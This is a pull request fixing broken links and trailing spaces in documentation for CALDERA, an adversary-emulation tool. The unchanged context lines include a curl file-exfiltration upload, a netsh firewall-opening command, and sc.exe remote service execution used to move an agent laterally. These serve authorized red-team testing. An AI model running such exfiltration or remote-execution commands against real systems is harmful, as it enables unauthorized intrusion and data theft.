### PR TITLE
Fix several broken links

### DIFF
--- a/sphinx-docs/Exfiltration.md
+++ b/sphinx-docs/Exfiltration.md
@@ -1,6 +1,6 @@
 # Exfiltration
 
-After completing an operation a user may want to review the data retreived from the target system. This data is automatically stored on the CALDERA server in a directory specified in [/conf/default.yml](Server-configuration.html#the-existing-default-yml).
+After completing an operation a user may want to review the data retreived from the target system. This data is automatically stored on the CALDERA server in a directory specified in [/conf/default.yml](Server-Configuration.html#configuration-file).
 
 ## Exfiltrating Files
 
@@ -9,11 +9,11 @@ Some abilities will transfer files from the agent to the CALDERA server. This ca
 curl -X POST -F 'data=@/file/path/' http://server_ip:8888/file/upload
 ```
 Note: localhost could be rejected in place of the server IP. In this case you will get error 7. You should type out the full IP.
-These files are sent from the agent to server_ip/file/upload at which point the server places these files inside the directory specified by [/conf/default.yml to key "exfil_dir"](Server-configuration.html#the-existing-default-yml). By default it is set to /tmp/caldera
+These files are sent from the agent to server_ip/file/upload at which point the server places these files inside the directory specified by [/conf/default.yml to key "exfil_dir"](Server-Configuration.html#configuration-file). By default it is set to /tmp/caldera
 
 ## Accessing Exfiltrated Files
 
-The server stores all exfiltrated files inside the directory specified by [/conf/default.yml to key "exfil_dir"](Server-configuration.html#the-existing-default-yml). By default it is set to /tmp/caldera
+The server stores all exfiltrated files inside the directory specified by [/conf/default.yml to key "exfil_dir"](Server-Configuration.html#configuration-file). By default it is set to /tmp/caldera
 
 Files can be accessed by pulling them directly from that location when on the server and manually unencrypting the files.
 
@@ -25,7 +25,7 @@ All downloaded files will be unencrypted before passing along as a download.
 
 ## Accessing Operations Reports
 
-After the server is shut down the reports from operations are placed inside the directory specified by the [/conf/default.yml to key "reports_dir"](Server-configuration.html#the-existing-default-yml). By default it is also set to /tmp
+After the server is shut down the reports from operations are placed inside the directory specified by the [/conf/default.yml to key "reports_dir"](Server-Configuration.html#configuration-file). By default it is also set to /tmp
 
 
 ## Unencrypting the files

--- a/sphinx-docs/Installing-CALDERA.md
+++ b/sphinx-docs/Installing-CALDERA.md
@@ -60,7 +60,7 @@ Next, install the pip requirements:
 sudo pip3 install -r requirements.txt
 ```
 
-Finally, start the server (optionally with startup [flags](Server-Configuration#startup-parameters) for additional logging):
+Finally, start the server (optionally with startup [flags](Server-Configuration.html#startup-parameters) for additional logging):
 
 ```sh
 python3 server.py

--- a/sphinx-docs/Lateral-Movement-Guide.md
+++ b/sphinx-docs/Lateral-Movement-Guide.md
@@ -2,14 +2,14 @@
 
 Exercising Caldera's lateral movement and remote execution abilities allows you to test how easily an adversary can move
 within your network. This guide will walk you through some of the necessary setup steps to get started with testing 
-lateral movement in a Windows environment.  
+lateral movement in a Windows environment.
 
 ## Setup
 
 ### Firewall Exceptions and Enabling File and Printer Sharing
 
 The firewall of the target host should not be blocking UDP ports 137 and 138 and TCP ports 139 and 445. The firewall
-should also allow inbound file and printer sharing. 
+should also allow inbound file and printer sharing.
 
 ```
 netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
@@ -30,7 +30,7 @@ account. The example walkthrough in this guide should not be impacted by these d
 ## Lateral Movement Using CALDERA
 Lateral movement can be a combination of two steps. The first requires confirmation of remote access to the next target 
 host and the movement or upload of the remote access tool (RAT) executable to the host. The second part requires 
-*execution* of the binary, which upon callback of the RAT on the new host would complete the lateral movement. 
+*execution* of the binary, which upon callback of the RAT on the new host would complete the lateral movement.
 
 Most of CALDERA's lateral movement and execution abilities found in Stockpile have fact or relationship requirements 
 that must be satisfied. This information may be passed to the operation in two ways:
@@ -40,7 +40,7 @@ an operation, open the "**AUTONOMOUS**" drop down section and select "Use [inser
 operation that it should take in fact and relationship information from the selected source.
 2. The fact and relationship information can be discovered by an operation. This requires additional abilities to be run
 prior to the lateral movement and execution abilities to collect the necessary fact and relationship information 
-necessary to satisfy the ability requirements. 
+necessary to satisfy the ability requirements.
 
 ### Moving the Binary
 There are several ways a binary can be moved or uploaded from one host to another. Some example methods used in 
@@ -59,7 +59,7 @@ CALDERA's Stockpile execution abilities relevant to lateral movement mainly use 
 additional execution methods include modifications to Windows services and scheduled tasks. The example in this guide 
 will use the creation of a service to remotely start the binary (ability file included at the end of this guide).
 
-See ATT&CK's [Execution](https://attack.mitre.org/tactics/TA0002/) tactic page for more details on execution methods. 
+See ATT&CK's [Execution](https://attack.mitre.org/tactics/TA0002/) tactic page for more details on execution methods.
 
 ### Displaying Lateral Movement in Debrief
 Using the adversary profile in this guide and CALDERA's Debrief plugin, you can view the path an adversary took through 
@@ -75,9 +75,9 @@ host, which moved laterally to the `VAGRANTDC` machine via successful execution 
 
 This capability relies on the `origin_link_id` field to be populated within the agent profile upon first
 check-in and is currently implemented for the default agent, Sandcat. For more information about the `#{origin_link_id}`
-global variable, see the explanation of **Command** in the [What is an Ability?](/docs/Learning-the-Terminology.html#what-is-an-ability)
+global variable, see the explanation of **Command** in the [What is an Ability?](Learning-the-terminology.html#abilities-and-adversaries)
 section of the Learning the Terminology guide. For more information about how lateral movement tracking is implemented 
-in agents to be used with CALDERA, see the [Lateral Movement Tracking](/docs/How-to-Build-Agents.html#lateral-movement-tracking) 
+in agents to be used with CALDERA, see the [Lateral Movement Tracking](How-to-Build-Agents.html#lateral-movement-tracking) 
 section of the How to Build Agents guide.
 
 
@@ -86,8 +86,6 @@ This section will walkthrough the necessary steps for proper execution of the Se
 adversary profile. This section will assume successful setup from the previous sections mentioned in this guide and that
 a Sandcat agent has been spawned with administrative privileges to the remote target host. The full ability files used 
 in this adversary profile are included at the end of this guide.
-
-See a video of the following steps [here](#video-walkthrough).
 
 1. Go to `navigate` pane > `Advanced` > `sources`. This should open a new sources modal in the web GUI.
 2. Click the toggle to create a new source. Enter "SC Source" as the source name. Then enter `remote.host.fqdn` as the 
@@ -100,7 +98,7 @@ drop down, try refreshing the page.
 4. Once operation configurations have been completed, click `Start` to start the operation.
 5. Check the agents list for a new agent on the target host.
 
-### Ability Files Used 
+### Ability Files Used
 ```
 - id: deeac480-5c2a-42b5-90bb-41675ee53c7e
   name: View remote shares
@@ -183,7 +181,5 @@ drop down, try refreshing the page.
           sc.exe \\#{remote.host.fqdn} start sandsvc;
           Start-Sleep -s 15;
           Get-Process -ComputerName #{remote.host.fqdn} s4ndc4t;
-```  
-
-
+```
 


### PR DESCRIPTION
## Description

Fix several broken links and remove reference to video that no longer exists.

Also removed some unnecessary trailing spaces in the lateral movement guide.

## Type of change

- [X] Bug fix (non-breaking change which fixes an issue)
- [X] This change requires a documentation update

## How Has This Been Tested?

Tested links on current ReadTheDocs latest version and locally after the fixes and verified all changed links worked.

## Checklist:

- [X] My code follows the style guidelines of this project
- [X] I have performed a self-review of my own code
- [X] I have made corresponding changes to the documentation
- [ ] I have added tests that prove my fix is effective or that my feature works
